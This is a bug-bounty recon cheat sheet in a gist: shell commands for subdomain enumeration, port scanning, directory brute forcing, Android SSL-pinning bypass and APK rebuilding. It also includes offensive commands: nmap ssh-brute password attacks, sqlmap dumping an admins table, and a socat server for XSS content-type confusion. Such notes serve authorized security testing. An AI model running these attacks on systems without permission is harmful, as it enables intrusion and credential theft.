@ruevaughn
Last active October 8, 2021 14:17
Recon portion of my approach to bug bounties. It's a WIP
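# ---- Scratch: triage saved HTTP responses ----
# Comments use '#' so this file parses as shell; the ":%!" filter below is a
# vim ex command and is kept as a comment rather than a shell line.

# List the response bodies (*.body, as written by fff) under the current tree.
find . -type f -name "*.body"
# Extract every <title> from those bodies and review them in vim.
# html-tool reads the file names from stdin.
find . -type f -name "*.body" | html-tool tags title | vim -

# grep templates (GNU grep is "ggrep" on macOS/Homebrew). The empty "" is a
# placeholder for the pattern — as written it matches every line.
# -H file name, -h no file name, -r recurse, -n line number, -i ignore case.
ggrep -Hrni ""
ggrep -hri ""

# vim, not shell: filter the whole buffer through sort, dropping duplicates.
#   :%! sort -u --version-sort

# Check whether the host's address falls in published AWS ranges.
onaws domain.com
# Passive subdomain enumeration, then resolve the names with dnsx.
# (typo fixed: "dommain.com" -> "domain.com"; TODO confirm "-req" against `dnsx -h`
# for your dnsx version — "-resp" is the documented response flag)
subfinder -d domain.com | dnsx -req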
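# ==== Bug Bounty Recon Pipeline ====
# Scope: every command here talks to live hosts. Keep targets inside the
# program's published scope and read its rules before anything active
# (ssh-brute especially — noisy, can lock accounts, and is forbidden by most programs).
# Placeholders are written in CAPS (TARGET, YOUR_URL). The old notes used 1.1.1.1
# as a stand-in, which is Cloudflare's public resolver — a real third party, so
# it has been replaced.

# amass: enumerate, then query the local graph database it populated.
amass enum -d owasp.org
amass db -names -d owasp.org
amass db -summary -d owasp.org
amass db -show -d owasp.org
amass db -names -src -d mytarget.com        # -src: show which data source found each name
amass intel -active -whois -d owasp.org     # related root domains via WHOIS; -active adds probing

# Other enumerators fed from the wildcard roots.
# anew appends only lines not already present in the target file.
cat wildcards | assetfinder --subs-only | anew domains
cat wildcards | findomain --stdin --output

# Which names answer on HTTP(S)?  -c is concurrency.
cat domains | httprobe -c 80 --prefer-https | anew httprobe.out
cat findomain.out | anew domains | httprobe -c 50 | anew hosts

# fff: fetch each host and save responses under ./roots (-d delay in ms, -S save).
cat hosts | fff -d 1 -S -o roots
# comb: one URL x a short wordlist; fff -s 200 saves only responses with status 200.
comb <(echo https://some.url) ~/recon/files/short-wordlist.txt | fff -s 200
# Keep the last three DNS labels of every name (a.b.example.com -> b.example.com)
# to surface additional roots worth enumerating.
cat final | rev | cut -d . -f 1-3 | rev | sort -u | tee root.subdomains

waybackurls domain.com

# gobuster: -k (skip TLS verification) takes no value; the output file belongs to -o.
# The original template read "-u <url ... -k dirscan.txt", leaving dirscan.txt as a
# dangling argument and the URL placeholder unclosed.
gobuster dir -u YOUR_URL -w YOUR_WORDLIST -x YOUR_EXT -k -o dirscan.txt
gobuster dir -u http://192.168.38.20 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
gobuster dir -u https://www.domain.com -w /home/user/bounty/awesome-wordlists/wordlists/discovery/directory_only_one.small.txt --wildcard

# nmap: all ports with default scripts and version detection; -Pn skips host
# discovery, -n skips reverse DNS.
nmap -sC -sV -p- TARGET
nmap -sV -Pn -n TARGET
nmap 192.168.1.0/24 -p 22 --open
# SSH password brute force — only where the program explicitly permits it.
# A single --script-args list carries both the wordlists and the timeout, so the
# result does not depend on how nmap merges a repeated flag.
nmap 192.168.254.13 -p 22 --script ssh-brute --script-args userdb=users.txt,passdb=passwords.txt
nmap -p 22 --script ssh-brute \
  --script-args userdb=users.lst,passdb=pass.lst,ssh-brute.timeout=4s TARGET

# AngularJS client-side template injection scanner: https://github.com/tijme/angularjs-csti-scanner
acstis -d "https://finnwea.com/some/page/?category=23"
# XSpear XSS scanner: https://github.com/hahwul/XSpear
xspear -u 'https://www.hahwul.com/?q=123' --cookie='role=admin' -v 1 -a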
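# ==== Mobile ====

# Frida: list processes on the USB-attached device (-U).
frida-ps -U
# SSL pinning bypass for Android: spawn the target (-f; on Android this is the
# package name) with a CodeShare script. The long option is --no-pause — the
# original "-no-pause" is parsed as "-n o-pause" (attach to a process called
# "o-pause") and conflicts with -f. On recent Frida versions not pausing is the
# default and the flag may be rejected; check `frida --help`.
frida -U --no-pause --codeshare pcipolloni/universal-android-ssl-pinning-bypass-with-frida -f YOUR_BINARY

# Objection (runtime exploration on top of Frida)
#   https://github.com/sensepost/objection
# MobSF (static/dynamic analysis)
#   https://mobsf.github.io

# Device CPU ABI — pick the matching frida-server build.
adb shell getprop ro.product.cpu.abi

# Launch an exported activity directly by component name (package/activity).
adb shell am start -n com.android.insecurebankv2/com.android.insecurebankv2.PostLogin

# Route device HTTP traffic to the host over adb. The device proxies to
# localhost:8082, and `adb reverse tcp:<device> tcp:<host>` must map that same
# device port (the original mapped 3333, so the proxied traffic never reached the
# host) onto the port Burp listens on — adjust the second port to your listener.
# Undo with: adb shell settings put global http_proxy :0
adb shell settings put global http_proxy localhost:8082
adb reverse tcp:8082 tcp:8082

# Burp CA: push, then install it from Settings as a user certificate. Note that
# apps targeting Android 7+ ignore user-added CAs unless their network security
# config opts in — hence the pinning bypass above or a system-store install.
adb push ./burp-android-cert.cer /sdcard/Download/

# frida-server: push to the directory it is run from (the original pushed to
# /data/local/ but ran /data/local/tmp/frida-server), mark it executable with
# 755 rather than 777 (a world-writable binary later run as root can be swapped
# by any app on the device), and start it in the background. Needs root:
# `adb root` on a userdebug emulator, or run it via `su -c` on a rooted device.
adb push /path/to/frida-server /data/local/tmp/
adb shell chmod 755 /data/local/tmp/frida-server
adb shell "/data/local/tmp/frida-server &"

# apktool: decode the APK to smali/resources (output dir InsecureBankv2/),
# rebuild after edits (-f overwrites). The rebuilt APK must be re-signed
# (apksigner/jarsigner) with the key below before it will install.
apktool d InsecureBankv2.apk
apktool b -f -d InsecureBankv2/
# Signing key for rebuilt APKs (the two original lines were one command split
# without a continuation).
keytool -genkey -v -keystore ctf.keystore -alias ctfKeystore \
  -keyalg RSA -keysize 2048 -validity 1000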
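# sqlmap against a login POST body: enumerate databases, then dump level2.admins.
# The original pinned a real public IP left over from a CTF; it is replaced with
# placeholders so the note cannot be replayed against someone else's host.
# -u is the documented way to pass the URL.
sqlmap -u "http://TARGET/PATH/login" --data "username=a&password=b" --dbms=mysql --dbs
sqlmap -u "http://TARGET/PATH/login" --data "username=a&password=b" --dbms=mysql --dbs -D level2 -T admins --dump

# DNS enumeration (records, zone transfer attempts, brute force per tool defaults).
dnsrecon.py -d domain.com
# Sweep a CIDR for a host whose page carries the site's <title> — presumably to
# locate an origin server behind a CDN. 0.0.0.0/24 is a placeholder; fill in the
# candidate range, and exclude the CDN's own ranges (see below).
./real_ip_discover.py "site.com" 0.0.0.0/24 "<title>Welcome to site.com"

# Cloudflare's published edge ranges (to exclude from origin hunting):
#   https://www.cloudflare.com/ips-v4

tldr curl
tldr awk

# Serve one file as an HTTP response that carries two Content-Type headers
# (image/png, then text/html) — presumably deliberate, to see which one a
# client honours for an uploaded "image" (XSS via content-type confusion).
# Binding TCP port 80 needs root/CAP_NET_BIND_SERVICE and listens on all
# interfaces, so anyone who can reach the host can fetch the payload.
# $(...) replaces backticks and the file name is quoted; the response body is
# streamed by dd (its progress output is silenced).
FILE=xss.jpg
socat -v -d -d TCP-LISTEN:80,fork \
  "SYSTEM:/bin/echo 'HTTP/1.1 200 OK';/bin/echo 'Content-Length: '$(wc -c <"$FILE");/bin/echo 'Content-Type: image/png';/bin/echo 'Content-Type: text/html';/bin/echo;dd 2>/dev/null <\"$FILE\""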